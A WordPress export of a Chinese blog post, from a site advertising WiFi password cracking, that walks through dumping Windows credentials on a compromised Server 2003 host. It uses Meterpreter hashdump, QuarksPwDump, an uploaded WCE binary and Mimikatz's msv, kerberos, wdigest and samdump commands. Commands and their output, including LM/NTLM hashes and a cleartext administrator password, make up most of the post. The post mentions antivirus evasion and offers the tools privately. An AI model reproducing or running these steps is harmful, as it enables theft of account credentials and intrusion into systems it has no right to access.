{"id":458,"date":"2024-03-14T02:10:59","date_gmt":"2024-03-13T18:10:59","guid":{"rendered":"http:\/\/www.ccwifi.cc\/blogs\/?p=458"},"modified":"2024-03-14T02:10:59","modified_gmt":"2024-03-13T18:10:59","slug":"%e5%a4%9a%e7%a7%8d%e5%a7%bf%e5%8a%bf%e6%8a%93%e5%8f%96windows%e7%b3%bb%e7%bb%9f%e7%9a%84hash%e5%80%bc","status":"publish","type":"post","link":"https:\/\/www.ccwifi.cc\/blogs\/2024\/03\/14\/%e5%a4%9a%e7%a7%8d%e5%a7%bf%e5%8a%bf%e6%8a%93%e5%8f%96windows%e7%b3%bb%e7%bb%9f%e7%9a%84hash%e5%80%bc\/","title":{"rendered":"\u591a\u79cd\u59ff\u52bf\u6293\u53d6windows\u7cfb\u7edf\u7684hash\u503c"},"content":{"rendered":"
\n

\u5728\u7ebfwifi\u8dd1\u5305 \u91d1\u521a\u5305\u8dd1\u5305 cap\u8dd1\u5305 hccapx ewsa\u5728\u7ebf \u5c31\u6765 \u66f9\u64cdwifi<\/a><\/strong><\/p>\n

\u5404\u4f4d\u597d \u53c8\u89c1\u9762\u4e86 \u6211\u662f\u66f9\u64cd \u4eca\u5929\u7ed9\u5927\u5bb6\u5e26\u6765\u4e00\u7bc7\u65b0\u7684\u6559\u7a0b<\/p>\n

\u5e0c\u671b\u5404\u4f4d\u7ec6\u5fc3\u5b66\u4e60 \u4f4e\u8c03\u7528\u7f51<\/p>\n<\/div>\n

\nmeterpreter ><\/span> hashdump\nAdministrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::\nASPNET:1007:4274ebc980bc50aed4a6c053eb6761b1:326f3aae7bd9312f6b32afafec858d53:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nSUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:ae694413fb708add0aa8b1b47358ce92:::\n<\/code><\/pre>\n
\u524d\u8a00<\/h3>\n
\u5728\u8fd9\u91cc\u6293\u53d6\u6f14\u793a\u7684\u7cfb\u7edf\u90fd\u662f03\u7684\u7cfb\u7edf\u3002hashdump\u6293\u53d6\u5bc6\u7801\u3002\u4ece\u76ee\u6807\u673a\u4e2d\u63d0\u53d6hash\u503c\uff0c\u7834\u89e3hash\u503c\u5c31\u53ef\u83b7\u5f97\u8d26\u53f7\u5bc6\u7801\uff0c\u8ba1\u7b97\u673a\u4e2d\u7684\u6bcf\u4e2a\u8d26\u53f7\uff08\u5982\u679c\u662f\u57df\u670d\u52a1\u5668\uff0c\u5219\u4e3a\u57df\u5185\u7684\u6bcf\u4e2a\u8d26\u53f7\uff09\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\u90fd\u5b58\u50a8\u5728sam\u6587\u4ef6\u4e2d\uff0c\u5f53\u8ba1\u7b97\u673a\u8fd0\u884c\u65f6\uff0c\u8be5\u6587\u4ef6\u5bf9\u6240\u6709\u8d26\u53f7\u8fdb\u884c\u9501\u5b9a\uff0c\u8981\u8bbf\u95ee\u5c31\u5fc5\u987b\u6709\u7cfb\u7edf\u7ea7\u8d26\u53f7\uff0c\u6240\u4ee5\u8981\u4f7f\u7528\u8be5\u547d\u4ee4\u5c31\u5fc5\u987b\u8fdb\u884c\u6743\u9650\u63d0\u5347\u3002\u5728shell\u63d0\u793a\u7b26\u4e0b\u8f93\u5165hashdump\u547d\u4ee4\uff0c\u5c06\u5bfc\u51fa\u76ee\u6807\u673asam\u6570\u636e\u5e93\u4e2d\u7684hash\u3002<\/p>\n
 -<\/span> \u68c0\u67e5meterpreter\u4f1a\u8bdd\u7684\u6743\u9650\u548c\u76ee\u6807\u673a\u64cd\u4f5c\u7cfb\u7edf\u7c7b\u578b\n -<\/span> \u68c0\u67e5\u76ee\u6807\u673a\u662f\u5426\u4e3a\u57df\u63a7\u5236\u670d\u52a1\u5668\n -<\/span> \u9996\u5148\u5c1d\u8bd5\u4ece\u6ce8\u518c\u673a\u4e2d\u8bfb\u53d6hash\u4e0d\u884c\u518d\u5c1d\u8bd5\u6ce8\u5165LSASS\u8fdb\u7a0b\n<\/code><\/pre>\n
\u76f4\u63a5\u8fd0\u884cQuarks PwDump.<\/span>exe\n-<\/span>dhl\uff1a\u5bfc\u51fa\u672c\u5730\u54c8\u5e0c\u503c\n-<\/span>dhdc\uff1a\u5bfc\u51fa\u5185\u5b58\u4e2d\u7684\u57df\u63a7\u54c8\u5e0c\u503c\n-<\/span>dhd\uff1a\u5bfc\u51fa\u57df\u63a7\u54c8\u5e0c\u503c\uff0c\u5fc5\u987b\u6307\u5b9aNTDS\u6587\u4ef6\n-<\/span>db\uff1a\u5bfc\u51faBitlocker\u4fe1\u606f\uff0c\u5fc5\u987b\u6307\u5b9aNTDS\u6587\u4ef6\n-<\/span>nt\uff1a\u5bfc\u51faNTDS\u6587\u4ef6\n-<\/span>hist\uff1a\u5bfc\u51fa\u5386\u53f2\u4fe1\u606f\uff0c\u53ef\u9009\u9879\n-<\/span>t\uff1a\u53ef\u9009\u5bfc\u51fa\u7c7b\u578b\uff0c\u9ed8\u8ba4\u5bfc\u51faJOhn\u7c7b\u578b\n-<\/span>o\uff1a\u5bfc\u51fa\u6587\u4ef6\u5230\u672c\u5730\n<\/code><\/pre>\n
\u6a21\u5757smart_hashdump<\/h3>\n
\u53e6\u4e00\u4efd\u6a21\u5757smart_hashdump\u7684\u529f\u80fd\u66f4\u4e3a\u5f3a\u5927\uff0c\u53ef\u4ee5\u5bfc\u51fa\u57df\u6240\u6709\u7528\u6237\u7684hash\uff0c\u5176\u5de5\u4f5c\u6d41\u7a0b\u5982\u4e0b\uff1a\u53ef\u4ee5\u66b4\u529b\u6216\u8005\u5f69\u8679\u8868\u6765\u5bf9\u6293\u53d6\u5230\u7684hash\u8fdb\u884c\u7834\u89e3\u3002Quarks PwDump\u6293\u53d6\u5bc6\u7801\u3002\u4e00\u6b3ewin32\u73af\u5883\u4e0b\u7684\u7cfb\u7edf\u6388\u6743\u4fe1\u606f\u5bfc\u51fa\u5de5\u5177\uff0c\u652f\u6301\u7684\u64cd\u4f5c\u7cfb\u7edf\u4e3axp\u300103\u3001win7\u3001win8\u30012008\u7b49\u3002\u5728windows\u7684\u5bc6\u7801\u7cfb\u7edf\u4e2d\uff0c\u5bc6\u7801\u4ee5\u52a0\u5bc6\u7684\u65b9\u5f0f\u4fdd\u5b58\u5728sam\u6587\u4ef6\u4e2d\uff0c\u800c\u8d26\u53f7\u5728\u767b\u5f55\u540e\u4f1a\u5c06\u5bc6\u7801\u7684\u5bc6\u6587\u548c\u660e\u6587\u4fdd\u5b58\u5728\u7cfb\u7edf\u7684\u5185\u5b58\u4e2d\uff0c\u6b63\u5e38\u4e0b\u662f\u4e0d\u80fd\u8bfb\u53d6\u7684\uff0c\u4f46\u662fQp\u5c31\u80fd\u8bfb\u53d6\u3002<\/p>\n
QuarksPwDump.<\/span>exe --<\/span>dump-<\/span>hash-<\/span>local --<\/span>output 1.<\/span>txt\n<\/code><\/pre>\n
meterpreter > upload \/<\/span>root\/<\/span>wce.<\/span>exe C:Documents and SettingsAdministrator\u684c\u9762wce_v1_3beta>\n<\/code><\/pre>\n
\u8fd9\u91cc\u4f7f\u7528\u8be5\u5de5\u5177\u6293\u53d6hash\u503c\u5e76\u5bfc\u51fa\uff0c\u53ef\u4ee5\u8f93\u5165\u547d\u4ee4\u5bfc\u51fa\u672c\u5730\u54c8\u5e0c\u503c\u5230\u5f53\u524d\u76ee\u5f55\u76841.txt\u3002windows Credentials Editor\u6293\u53d6\u5bc6\u7801\u3002Windows Credentials Editor (WCE) \u662f\u4e00\u6b3e\u529f\u80fd\u5f3a\u5927\u7684Windows\u5e73\u53f0\u5185\u7f51\u6e17\u900f\u5de5\u5177\uff0c\u5b83\u80fd\u5217\u4e3e\u767b\u5f55\u4f1a\u8bdd\uff0c\u5e76\u4e14\u53ef\u4ee5\u6dfb\u52a0\u3001\u6539\u53d8\u548c\u5220\u9664\u76f8\u5173\u51ed\u636e(\u4f8b\u5982LM\/NTHash)\u3002\u8fd9\u4e9b\u529f\u80fd\u5728\u5185\u7f51\u6e17\u900f\u4e2d\u80fd\u591f\u88ab\u5229\u7528\uff0c\u4f8b\u5982\uff0c\u5728Windows\u5e73\u53f0\u4e0a\u6267\u884c\u7ed5\u8fc7Hash\u64cd\u4f5c\u6216\u8005\u4ece\u5185\u5b58\u4e2d\u83b7\u53d6NT\/LM Hash (\u4e5f\u53ef\u4ee5\u4ece\u4ea4\u4e92\u5f0f\u767b\u5f55\u3001\u670d\u52a1\u3001\u8fdc\u7a0b\u684c\u9762\u8fde\u63a5\u4e2d\u83b7\u53d6)\u4ee5\u7528\u4e8e\u8fdb\u4e00\u6b65\u7684\u653b\u51fb\uff0c\u800c\u4e14\u4f53\u79ef\u4e5f\u975e\u5e38\u5c0f\uff0c\u662f\u5185\u7f51\u6e17\u900f\u65f6\u7684\u5fc5\u5907\u5de5\u5177\u3002\u4e0d\u8fc7\u5fc5\u987b\u5728\u7ba1\u7406\u5458\u6743\u9650\u4e0b\u4f7f\u7528\uff0c\u8fd8\u8981\u6ce8\u610f\u6740\u6bd2\u5de5\u5177\u7684\u514d\u6740\u3002\u9996\u5148\u8f93\u5165upload\u547d\u4ee4\u5c06wce.exe\u4e0a\u4f20\u5230\u76ee\u6807\u4e3b\u673aC\u76d8\u4e2d\uff0c\u7136\u540e\u5728\u76ee\u6807\u673aShell\u4e0b\u8f93\u5165wce-w\u547d\u4ee4\uff0c\u4fbf\u4f1a\u6210\u529f\u63d0\u53d6\u7cfb\u7edf\u660e\u6587\u7ba1\u7406\u5458\u7684\u5bc6\u7801\u3002<\/p>\n
-<\/span>c\u53c2\u6570\u7528\u4e8e\u6307\u5b9a\u4f1a\u8bdd\u6765\u6267\u884ccmd\n-<\/span>v\u53c2\u6570\u7528\u4e8e\u663e\u793a\u8be6\u7ec6\u4fe1\u606f\n-<\/span>w\u7528\u4e8e\u67e5\u770b\u5df2\u7ecf\u767b\u9646\u7684\u660e\u6587\u5bc6\u7801\n-<\/span>l\u8bfb\u53d6\u4ece\u5185\u5b58\u4e2d\u5df2\u7ecf\u767b\u9646\u7684\u4fe1\u606f\n-<\/span>f\u5f3a\u5236\u4f7f\u7528\u5b89\u5168\u7684\u65b9\u5f0f\u8bfb\u53d6\n-<\/span>g\u7528\u6765\u8ba1\u7b97\u5bc6\u7801\n<\/code><\/pre>\n
\u9ed8\u8ba4\u4f7f\u7528-|\u547d\u4ee4\u8bfb\u53d6\u6570\u636e\u683c\u5f0fusername: domain: Im: ntlm (\u8fd9\u79cd\u8bfb\u53d6\u662f\u4ece\u5185\u5b58\u4e2d\u8bfb\u53d6\u5df2\u7ecf\u767b\u5f55\u7684\u4fe1\u606f\uff0c\u800c\u4e0d\u662f\u8bfb\u53d6sam\u6570\u636e\u5e93\u4e2d\u7684\u4fe1\u606f)\uff0c\u9ed8\u8ba4\u7684\u8bfb\u53d6\u65b9\u5f0f\u662f\u5148\u7528\u5b89\u5168\u7684\u65b9\u5f0f\u8bfb\u53d6\uff0c\u82e5\u8bfb\u53d6\u5931\u8d25\u518d\u7528\u4e0d\u5b89\u5168\u7684\u65b9\u5f0f\uff0c\u6240\u4ee5\u5f88\u6709\u53ef\u80fd\u5bf9\u7cfb\u7edf\u9020\u6210\u7834\u574f\u3002\u8fd9\u91cc\u5efa\u8bae\u4f7f\u7528-f\u53c2\u6570\u5f3a\u5236\u4f7f\u7528\u5b89\u5168\u7684\u65b9\u5f0f\u8bfb\u53d6\u3002-g\u53c2\u6570\u662f\u7528\u6765\u8ba1\u7b97\u5bc6\u7801\u7684\uff0c\u5c31\u662f\u5236\u5b9a\u4e00\u4e2a\u7cfb\u7edf\u660e\u6587\u4f1a\u4f7f\u7528\u7684\u52a0\u5bc6\u65b9\u6cd5\u6765\u8ba1\u7b97\u5bc6\u6587-c\u53c2\u6570\u7528\u4e8e\u6307\u5b9a\u4f1a\u8bdd\u6765\u6267\u884ccmd, -v\u53c2\u6570\u7528\u4e8e\u663e\u793a\u8be6\u7ec6\u4fe1\u606f\uff0c\u8fd9\u6837\u624d\u80fd\u770b\u5230luid\u4fe1\u606f\uff0c-w\u53c2\u6570\u662f\u6700\u5173\u952e\u7684\uff0c\u7528\u4e8e\u67e5\u770b\u5df2\u767b\u5f55\u7684\u660e\u6587\u5bc6\u7801\u3002<\/p>\n
meterpreter > getuid\nServer username: NT AUTHORITYSYSTEM\n<\/code><\/pre>\n
Mimikatz\u6293\u53d6\u5bc6\u7801<\/h3>\n
Mimikatz\u662f\u6cd5\u56fd\u4e13\u5bb6Benjamin Delpy (@gentilkiwi)\u5199\u7684\u8f7b\u91cf\u7ea7\u8c03\u8bd5\u5668\uff0c\u4f5c\u4e3a\u4e00\u6b3e\u540e\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\uff0c\u5b83\u53ef\u4ee5\u5e2e\u52a9\u5b89\u5168\u6d4b\u8bd5\u4eba\u5458\u8f7b\u677e\u6293\u53d6\u7cfb\u7edf\u5bc6\u7801\uff0c\u6b64\u5916\u8fd8\u5305\u62ec\u80fd\u591f\u901a\u8fc7\u83b7\u53d6\u7684Kerberos\u767b\u5f55\u51ed\u636e\uff0c\u7ed5\u8fc7\u652f\u6301RestrictedAdmin\u6a21\u5f0f\u4e0bWindows 8\u6216Windows Server 2012\u7684\u8fdc\u7a0b\u7ec8\u7aef(RDP)\u7b49\u529f\u80fd\u3002\u5728\u6700\u521d\u6e17\u900f\u9636\u6bb5\u4e4b\u540e\u7684\u5927\u591a\u6570\u65f6\u95f4\u91cc\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u60f3\u5728\u8ba1\u7b97\u673a\/\u7f51\u7edc\u4e2d\u5f97\u5230\u4e00\u4e2a\u66f4\u575a\u56fa\u7684\u7acb\u8db3\u70b9\uff0c\u8fd9\u6837\u505a\u901a\u5e38\u9700\u8981\u4e00\u7ec4\u8865\u5145\u7684\u5de5\u5177\uff0cMimikatz\u5c31\u662f\u4e00\u79cd\u5c06\u653b\u51fb\u8005\u60f3\u6267\u884c\u7684\u3001\u6700\u6709\u7528\u7684\u4efb\u52a1\u6346\u7ed1\u5728\u4e00\u8d77\u7684\u5c1d\u8bd5\u3002\u9700\u8981\u6ce8\u610f\u8be5\u5de5\u5177\u5728Windows 2000\u4e0eWindows XP\u7cfb\u7edf\u4e0b\u65e0\u6cd5\u4f7f\u7528Metasploit\u5df2\u7ecf\u5c06\u5176\u4f5c\u4e3a\u4e00\u4e2aMeterpreter\u811a\u672c\u96c6\u6210\u4e86\uff0c\u4ee5\u4fbf\u7528\u6237\u4f7f\u7528\uff0c\u800c\u4e0d\u9700\u8981\u4e0a\u4f20\u8be5\u8f6f\u4ef6\u5230\u76ee\u6807\u4e3b\u673a\u4e0a\u3002Mimikatz\u5fc5\u987b\u5728\u7ba1\u7406\u5458\u6743\u9650\u4e0b\u4f7f\u7528\uff0c\u6b64\u65f6\u5047\u8bbe\u6211\u4eec\u901a\u8fc7\u4e00\u7cfb\u5217\u524d\u671f\u6e17\u900f\u5df2\u7ecf\u6210\u529f\u83b7\u5f97\u76ee\u6807\u673a\u7684Meterpreter Shell\u3002<\/p>\n
meterpreter > sysinfo\nComputer        : WWW\nOS              : Windows .<\/span>NET Server (<\/span>Build 3790,<\/span> Service Pack 2)<\/span>.<\/span>\nArchitecture    : x86\nSystem Language : zh_CN\nDomain          : WORKGROUP\nLogged On Users : 2\nMeterpreter     : x86\/<\/span>windows\n<\/code><\/pre>\n
\u83b7\u53d6\u7cfb\u7edfSYSTEM\u6743\u9650\u540e\uff0c\u9996\u5148\u67e5\u770b\u76ee\u6807\u673a\u5668\u7684\u67b6\u6784\u3002\u867d\u7136Mimikatz\u540c\u65f6\u652f\u630132\u4f4d\u548c64\u4f4d\u7684Windows\u67b6\u6784\uff0c\u4f46\u5982\u679c\u670d\u52a1\u5668\u662f64\u4f4d\u64cd\u4f5c\u7cfb\u7edf\uff0c\u76f4\u63a5\u4f7f\u7528Mimikatz\u540e\uff0cMeterpreter\u4f1a\u9ed8\u8ba4\u52a0\u8f7d\u4e00\u4e2a32\u4f4d\u7248\u672c\u7684Mimikatz\u5230\u5185\u5b58\uff0c\u4f7f\u5f97\u5f88\u591a\u529f\u80fd\u65e0\u6548\u800c\u4e14\u572864\u4f4d\u64cd\u4f5c\u7cfb\u7edf\u4e0b\u5fc5\u987b\u5148\u67e5\u770b\u7cfb\u7edf\u8fdb\u7a0b\u5217\u8868\uff0c\u7136\u540e\u5728\u52a0\u8f7dMimikatz\u4e4b\u524d\u5c06\u8fdb\u7a0b\u8fc1\u79fb\u5230\u4e00\u4e2a64\u4f4d\u7a0b\u5e8f\u7684\u8fdb\u7a0b\u4e2d\uff0c\u624d\u80fd\u67e5\u770b\u7cfb\u7edf\u5bc6\u7801\u660e\u6587\uff0c\u572832\u4f4d\u64cd\u4f5c\u7cfb\u7edf\u4e0b\u5c31\u6ca1\u6709\u8fd9\u4e2a\u9650\u5236\u3002\u8fd9\u91cc\u8f93\u5165sysinfo\u547d\u4ee4\u3002<\/p>\n
meterpreter > load mimikatz\nLoading extension mimikatz.<\/span>.<\/span>.<\/span>Success.<\/span>\nmeterpreter > help mimikatz\nMimikatz Commands\n=================\n    Command           Description\n    --<\/span>---<\/span>--<\/span>           --<\/span>---<\/span>---<\/span>---<\/span>\n    kerberos          Attempt to retrieve kerberos creds.<\/span>\n    livessp           Attempt to retrieve livessp creds.<\/span>\n    mimikatz_command  Run a custom command.<\/span>\n    msv               Attempt to retrieve msv creds (<\/span>hashes)<\/span>.<\/span>\n    ssp               Attempt to retrieve ssp creds.<\/span>\n    tspkg             Attempt to retrieve tspkg creds.<\/span>\n    wdigest           Attempt to retrieve wdigest creds.<\/span>\n    \n<\/code><\/pre>\n
meterpreter > mimikatz_command -<\/span>f a::\nModule : 'a'<\/span> introuvable\nModules disponibles : \n            \t-<\/span> Standard\n      crypto\t-<\/span> Cryptographie et certificats\n        hash\t-<\/span> Hash\n      system\t-<\/span> Gestion syst\ufffdme\n     process<\/span>\t-<\/span> Manipulation des processus\n      thread\t-<\/span> Manipulation des threads\n     service\t-<\/span> Manipulation des services\n   privilege\t-<\/span> Manipulation des privil\ufffdges\n      handle\t-<\/span> Manipulation des handles\n impersonate\t-<\/span> Manipulation tokens d'acc\ufffds\n     winmine\t- Manipulation du d\ufffdmineur\n minesweeper\t- Manipulation du d\ufffdmineur 7\n       nogpo\t- Anti-gpo et patchs divers\n     samdump\t- Dump de SAM\n      inject\t- Injecteur de librairies\n          ts\t- Terminal Server\n      divers\t- Fonctions diverses n'<\/span>ayant pas encore assez de corps pour avoir leurs propres module\n    sekurlsa\t-<\/span> Dump des sessions courantes par providers LSASS\n         efs\t-<\/span> Manipulations EFS\n<\/code><\/pre>\n
meterpreter > mimikatz_command -<\/span>f hash::\nModule : 'hash'<\/span> identifi\ufffd,<\/span> mais commande ''<\/span> introuvable\nDescription du module : Hash\n          lm\t-<\/span> Hash LanManager (<\/span>LM)<\/span> d'une cha\ufffdne de caract\ufffdres\n        ntlm\t- Hash NT LanManger (NTLM) d'<\/span>une cha\ufffdne de caract\ufffdres\n<\/code><\/pre>\n
\u76f4\u63a5\u52a0\u8f7dmimikatz\u5e76\u67e5\u770b\u5e2e\u52a9\u3002mimikatz command\u9009\u9879\u53ef\u4ee5\u8ba9\u6211\u4eec\u4f7f\u7528Mimikatz\u7684\u5168\u90e8\u529f\u80fd\uff0c\u9700\u8981\u901a\u8fc7\u52a0\u8f7d\u4e00\u4e2a\u9519\u8bef\u7684\u6a21\u5757\u5f97\u5230\u53ef\u7528\u6a21\u5757\u7684\u5b8c\u6574\u5217\u8868\u3002\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528”:\u201d\u8bed\u6cd5\u8bf7\u6c42\u67d0\u4e2a\u6a21\u5757\u53ef\u7528\u7684\u9009\u9879\uff0c\u9009\u5b9a\u4e00\u4e2a\u6a21\u5757\u540e\u4e5f\u53ef\u4ee5\u4f7f\u7528\u201d:\u201d\u67e5\u770b\u672c\u6a21\u5757\u7684\u5e2e\u52a9\uff0c\u4f8b\u5982\u67e5\u770bHash\u7684\u53ef\u7528\u9009\u9879\u6709Im\u548cntlm\u4e24\u79cd\u3002<\/p>\n
meterpreter > msv\n[<\/span>+<\/span>]<\/span> Running as SYSTEM\n[<\/span>*<\/span>]<\/span> Retrieving msv credentials\nmsv credentials\n===============\nAuthID    Package    Domain        User             Password\n--<\/span>---<\/span>-<\/span>    --<\/span>---<\/span>--<\/span>    --<\/span>---<\/span>-<\/span>        --<\/span>--<\/span>             --<\/span>---<\/span>---<\/span>\n0;<\/span>202037  NTLM       WWW           Administrator    lm{<\/span> 44efce164ab921caaad3b435b51404ee }<\/span>,<\/span> ntlm{<\/span> 32ed87bdb5fdc5e9cba88547376818d4 }<\/span>\n0;<\/span>996     Negotiate  NT AUTHORITY  NETWORK SERVICE  lm{<\/span> aad3b435b51404eeaad3b435b51404ee }<\/span>,<\/span> ntlm{<\/span> 31d6cfe0d16ae931b73c59d7e0c089c0 }<\/span>\n0;<\/span>997     Negotiate  NT AUTHORITY  LOCAL SERVICE    n.<\/span>s.<\/span> (<\/span>Credentials KO)<\/span>\n0;<\/span>53201   NTLM                                      n.<\/span>s.<\/span> (<\/span>Credentials KO)<\/span>\n0;<\/span>999     NTLM       WORKGROUP     WWW$             n.<\/span>s.<\/span> (<\/span>Credentials KO)<\/span>\n<\/code><\/pre>\n
\u77e5\u9053\u4e86Mimikatz\u7684\u5927\u6982\u4f7f\u7528\u65b9\u6cd5\u540e\uff0c\u6211\u4eec\u65e2\u53ef\u4ee5\u4f7f\u7528Metasploit\u5185\u5efa\u7684\u547d\u4ee4\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528Mimikatz\u81ea\u5e26\u7684\u547d\u4ee4\u4ece\u76ee\u6807\u673a\u5668\u4e0a\u5bfc\u51faHash\u548c\u660e\u6587\u8bc1\u4e66\u3002\u63a5\u7740\u76f4\u63a5\u8f93\u5165msv\u547d\u4ee4\u6293\u53d6\u7cfb\u7edfHash\u503c\u3002<\/p>\n
meterpreter > kerberos \n[<\/span>+<\/span>]<\/span> Running as SYSTEM\n[<\/span>*<\/span>]<\/span> Retrieving kerberos credentials\nkerberos credentials\n====================\nAuthID    Package    Domain        User             Password\n--<\/span>---<\/span>-<\/span>    --<\/span>---<\/span>--<\/span>    --<\/span>---<\/span>-<\/span>        --<\/span>--<\/span>             --<\/span>---<\/span>---<\/span>\n0;<\/span>996     Negotiate  NT AUTHORITY  NETWORK SERVICE  \n0;<\/span>997     Negotiate  NT AUTHORITY  LOCAL SERVICE    \n0;<\/span>53201   NTLM                                      \n0;<\/span>999     NTLM       WORKGROUP     WWW$             \n0;<\/span>202037  NTLM       WWW           Administrator    123456\n<\/code><\/pre>\n
meterpreter > wdigest \n[<\/span>+<\/span>]<\/span> Running as SYSTEM\n[<\/span>*<\/span>]<\/span> Retrieving wdigest credentials\nwdigest credentials\n===================\nAuthID    Package    Domain        User             Password\n--<\/span>---<\/span>-<\/span>    --<\/span>---<\/span>--<\/span>    --<\/span>---<\/span>-<\/span>        --<\/span>--<\/span>             --<\/span>---<\/span>---<\/span>\n0;<\/span>996     Negotiate  NT AUTHORITY  NETWORK SERVICE  \n0;<\/span>997     Negotiate  NT AUTHORITY  LOCAL SERVICE    \n0;<\/span>53201   NTLM                                      \n0;<\/span>999     NTLM       WORKGROUP     WWW$             \n0;<\/span>202037  NTLM       WWW           Administrator    123456\n<\/code><\/pre>\n
mimikatz_command -<\/span>f samdump:: \n<\/code><\/pre>\n
\u8f93\u5165kerberos\u547d\u4ee4\u53ef\u4ee5\u6293\u53d6\u7cfb\u7edf\u7968\u636e\u3002\u8f93\u5165wdigest\u547d\u4ee4\u53ef\u4ee5\u83b7\u53d6\u7cfb\u7edf\u8d26\u6237\u4fe1\u606f\u3002\u63a5\u7740\u8f93\u5165samdump\u547d\u4ee4\u67e5\u770bsamdump\u7684\u53ef\u7528\u9009\u9879\uff0c\u7136\u540e\u8f93\u5165mimikatz_command -f samdump:: hashes\u547d\u4ee4\u6293\u53d6Hash\u3002<\/p>\n
<\/p>\n
Mimikatz\u9664\u4e86\u53ef\u4ee5\u6293\u53d6Hash,\u8fd8\u6709\u5f88\u591a\u5176\u4ed6\u529f\u80fd\uff0c\u4f8b\u5982\u4f7f\u7528Handle\u6a21\u5757\u3001list\/kill\u8fdb\u7a0b\uff0c\u4ee5\u53ca\u6a21\u62df\u7528\u6237\u4ee4\u724c\u3002\u9700\u8981\u5de5\u5177\u770b\u8fd9\u91cc\u3002\u53c8\u662f\u6734\u7d20\u800c\u53c8\u5145\u5b9e\u7684\u4e00\u5929\u554a\uff01\u9700\u8981\u5de5\u5177\u7684\u53ef\u4ee5\u52a0\u6211\u6216\u8005\u79c1\u804a\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u591a\u79cd\u59ff\u52bf\u6293\u53d6windows\u7cfb\u7edf\u7684hash\u503c\u524d\u8a00\u8fd9\u91cc\u6293\u53d6\u6f14\u793a\u7684\u7cfb\u7edf\u90fd\u662f03\u7684\u7cfb\u7edf\u3002hashdump\u6293\u53d6\u5bc6\u7801\u4ece\u76ee\u6807\u673a\u4e2d\u63d0\u53d6hash\u503c\uff0c\u7834\u89e3hash\u503c\u5c31\u53ef\u83b7\u5f97\u8d26\u53f7\u5bc6\u7801\uff0c\u8ba1\u7b97\u673a\u4e2d\u7684\u6bcf\u4e2a\u8d26\u53f7\uff08\u5982\u679c\u662f\u57df\u670d\u52a1\u5668<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"topic":[],"class_list":["post-458","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/458","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/comments?post=458"}],"version-history":[{"count":0,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/458\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/media?parent=458"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/categories?post=458"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/tags?post=458"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/topic?post=458"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}